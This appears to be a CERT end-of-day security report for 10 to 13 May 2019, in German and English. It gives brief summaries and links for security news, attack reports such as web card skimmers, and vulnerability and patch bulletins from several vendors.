End-of-Day report
Timeframe: Freitag 10-05-2019 18:00 - Montag 13-05-2019 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
News
Administration: Microsoft empfiehlt ein separat abgesichertes Gerät
Wer komplexe Systeme administriert, kann auch schnell zu einem attraktiven Angriffsziel werden. Microsoft gibt einige Tipps aus dem eigenen Hause, um diese Gefahr zu minimieren. Dazu gehört der Einsatz spezieller Geräte.
https://www.golem.de/news/administration-microsoft-empfiehlt-ein-separat-abgesichertes-geraet-1905-141199-rss.html
Hashfunktion: Der nächste Nagel im Sarg von SHA-1
Eigentlich wissen es alle: Die Hashfunktion SHA-1 ist tot. Forscher haben jetzt eine Methode gefunden, Angriffe auf das Verfahren noch praxisrelevanter zu machen.
https://www.golem.de/news/hashfunktion-der-naechste-nagel-im-sarg-von-sha-1-1905-141197-rss.html
AR19-133A: Microsoft Office 365 Security Observations
Original release date: May 13, 2019 Summary As the number of organizations migrating email services to Microsoft Office 365 (O365) and other cloud services increases, the use of third-party companies that move organizations to the cloud is also increasing. Organizations and their third-party partners need to be aware of the risks involved in transitioning to O365 and other cloud services.
https://www.us-cert.gov/ncas/analysis-reports/AR19-133A
Hackers are collecting payment details, user passwords from 4,600 sites
Hackers have breached analytics service Picreel and open-source project Alpaca Forms and have modified JavaScript files on the infrastructure of these two companies to embed malicious code on over 4,600 websites, security researchers have told ZDNet. The attack is ongoing, and the malicious scripts are still live, at the time of this articles publishing.
https://www.zdnet.com/article/hackers-are-collecting-payment-details-user-passwords-from-4600-sites/
Microsoft erweitert BitLocker-Verwaltungsoptionen für Unternehmen
Microsoft plant zur Verwaltung der BitLocker-Verschlüsselung in Unternehmensumgebungen Erweiterungen für Intune und den System Center Configuration Manager.
https://heise.de/-4420137
Jetzt patchen: Angreifer nehmen ältere SharePoint-Server-Lücke ins Visier
Die schon im Februar/März gefixte Lücke CVE-2019-0604 wird aktiv ausgenutzt. Wer die Updates noch nicht installiert hat, sollte spätestens jetzt handeln.
https://heise.de/-4420747
Images Loading Credit Card Swipers
We-ve come across an interesting approach to injecting credit card swipers into Magento web pages. Instead of injecting a real script, attackers insert a seemingly benign, invisible image from the same site. The catch is, the tag has an "onload" event handler that loads the malicious script.
http://labs.sucuri.net/?note=2019-05-10
NVIDIA Patches High Severity Bugs in GPU Display Driver
NVIDIA has released patches to address High severity vulnerabilities in its NVIDIA GPU Display Driver that could allow an attacker to escalate privileges or execute code on vulnerable systems. read more
https://www.securityweek.com/nvidia-patches-high-severity-bugs-gpu-display-driver
Vulnerabilities
SQLite: Schwachstelle in Programmbibliothek erlaubt Remote Code Execution
Seit April gibt es SQLite in Version 3.28.0. Angesichts einer kritischen Schwachstelle in früheren Versionen sollten Entwickler schleunigst umsteigen.
https://heise.de/-4421109
Security updates for Monday
Security updates have been issued by Debian (atftp, ghostscript, openjdk-7, and postgresql-9.4), Fedora (java-11-openjdk, mosquitto, and php), Mageia (bash, binutils, clamav, cronie, jasper, kernel, mxml, openexr, openssh, python, qt4, svgsalamander, sysstat, tar, and tcpreplay), openSUSE (openssl, python3, sqlite3, webkit2gtk3, and wireshark), Red Hat (bind, flatpak, freeradius:3.0, java-1.8.0-openjdk, python-jinja2, rh-ror42-rubygem-actionpack, rh-ror50-rubygem-actionpack, rh-ruby23-ruby, [...]
https://lwn.net/Articles/788266/
Gemalto DS3 Authentication Server / Ezio Server Command Injection / File Disclosure
https://cxsecurity.com/issue/WLB-2019050121
IBM Security Bulletin: Multiple vulnerabilities in IBM® Java SDK affects WebSphere Application Server April 2019 CPU that is bundled with IBM WebSphere Application Server Patterns
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-ibm-java-sdk-affects-websphere-application-server-april-2019-cpu-that-is-bundled-with-ibm-websphere-application-server-patterns/
IBM Security Bulletin: IBM MQ RDQM and IBM MQ Appliance are vulnerable to a denial of service attack (CVE-2018-1084)
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-mq-rdqm-and-ibm-mq-appliance-are-vulnerable-to-a-denial-of-service-attack-cve-2018-1084/
IBM Security Bulletin: Rational DOORS Web Access is affected Cross-site scripting vulnerability
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-rational-doors-web-access-is-affected-cross-site-scripting-vulnerability/
Linux kernel vulnerability CVE-2017-8824
https://support.f5.com/csp/article/K15526101
Vulnerability Spotlight: Multiple vulnerabilities in the Roav A1 Dashcam
https://blog.talosintelligence.com/2019/05/vulnerability-spotlight-multiple.html